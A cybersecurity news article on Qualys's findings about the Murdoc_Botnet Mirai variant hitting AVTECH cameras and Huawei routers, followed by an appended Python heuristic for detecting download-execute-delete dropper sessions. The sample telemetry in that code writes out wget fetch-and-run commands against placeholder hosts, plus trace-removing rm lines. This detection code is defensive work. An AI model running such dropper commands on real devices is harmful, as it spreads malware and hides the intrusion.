UPDATED 09:00 EST / JANUARY 21 2025


New Mirai variant ‘Murdoc_Botnet’ targets AVTECH cameras and Huawei routers

Researchers at cybersecurity software provider Qualys Inc. are warning of a new Mirai botnet variant that’s being used to target vulnerabilities in AVTECH cameras and Huawei HG523 routers.

The variant, dubbed “Murdoc_Botnet,” was first detected in July and has already been found to have affected at least 1,300 devices globally, especially in Malaysia, Thailand, Mexico and Indonesia. Like all Mirai variants, it aims to infect as many devices as possible and assemble them into new, extensive botnets.

The Qualys researchers found that Murdoc_Botnet employs a combination of ELF files and shell scripts to infiltrate devices. The scripts exploit vulnerabilities, such as CVE-2024-7029 and CVE-2017-17215, to deploy malware payloads and establish persistent connections with command-and-control servers.

The campaign’s infrastructure includes over 100 distinct command-and-control servers, each responsible for managing and propagating malware to compromised devices. The servers communicate with infected devices to orchestrate activities such as payload execution, further infection and botnet expansion.

Murdoc_Botnet favors internet of things devices, particularly AVTECH cameras and Huawei routers, because their known vulnerabilities are unlikely to be patched, ensuring a steady stream of new victims to enlarge its network.

The malware spreads by executing bash scripts that fetch and execute payloads. The scripts are also designed to remove traces of their activity post-execution, making it harder for security tools to detect and mitigate the threat.

The Qualys researchers recommend that enterprise users and administrators make efforts to identify and protect against such attacks.

Recommended action includes regularly monitoring for suspicious processes, events and network traffic spawned by the execution of any untrusted binaries and scripts. Administrators and users should always be cautious in executing shell scripts from unknown or untrusted sources and admins should keep systems and firmware updated with the latest releases and patches.
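The fetch, execute and clean-up sequence described above is the kind of process activity the recommended monitoring would look for. As an added example (not from the Qualys report or this article), the Python below walks constructed per-session command-line records and flags sessions that download a file, run it and then delete it; the host names, file names and session ids are placeholders.

```python
import shlex
from collections import defaultdict
from posixpath import basename

DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}
INTERPRETERS = {"sh", "bash", "ash"}
FULL_PATTERN = {"downloaded", "executed", "removed"}

# Constructed sample telemetry as (session_id, command_line); host names are
# placeholders, not indicators from the Qualys report.
SAMPLE_EVENTS = [
    ("s1", "wget http://dropper.example.invalid/x86 -O /tmp/x86"),
    ("s1", "chmod +x /tmp/x86"),
    ("s1", "/tmp/x86 murdoc"),
    ("s1", "rm -rf /tmp/x86"),                      # trace removal after run
    ("s2", "curl -o /var/log/app.log https://updates.example.invalid/app.log"),
    ("s3", "wget http://dropper.example.invalid/bins.sh"),   # saved as bins.sh
    ("s3", "sh bins.sh"),
    ("s3", "rm bins.sh"),
]

def downloaded_path(argv):
    """Return the file a download command writes to disk, or None."""
    if basename(argv[0]) not in DOWNLOADERS:
        return None
    out = [argv[i + 1] for i, a in enumerate(argv[:-1]) if a in ("-O", "-o")]
    urls = [a for a in argv if "://" in a]
    # wget without -O saves under the URL basename; curl without -o uses stdout
    if not out and urls and basename(argv[0]) == "wget":
        return basename(urls[0])
    return out[0] if out else None

def executes(argv, path):
    cmd = argv[0]  # direct run, ./name from the download dir, or via a shell
    if cmd == path or (cmd.startswith("./") and basename(cmd) == basename(path)):
        return True
    return basename(cmd) in INTERPRETERS and path in argv[1:]

def find_dropper_sessions(events):
    """Map session -> files that were downloaded, executed and then deleted."""
    stages = defaultdict(dict)                      # session -> {path: stages}
    for sid, cmdline in events:
        argv = shlex.split(cmdline) or [""]         # empty line: harmless no-op
        if dest := downloaded_path(argv):
            stages[sid].setdefault(dest, {"downloaded"})
        for path, seen in stages[sid].items():
            if executes(argv, path):
                seen.add("executed")
            elif "executed" in seen and argv[0] == "rm" and path in argv[1:]:
                seen.add("removed")
    return {sid: hit for sid, paths in stages.items()
            if (hit := sorted(p for p, s in paths.items() if s >= FULL_PATTERN))}
```

A download that is never executed (session s2 above) is not reported, so the heuristic keys on the full sequence rather than on any single download command.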
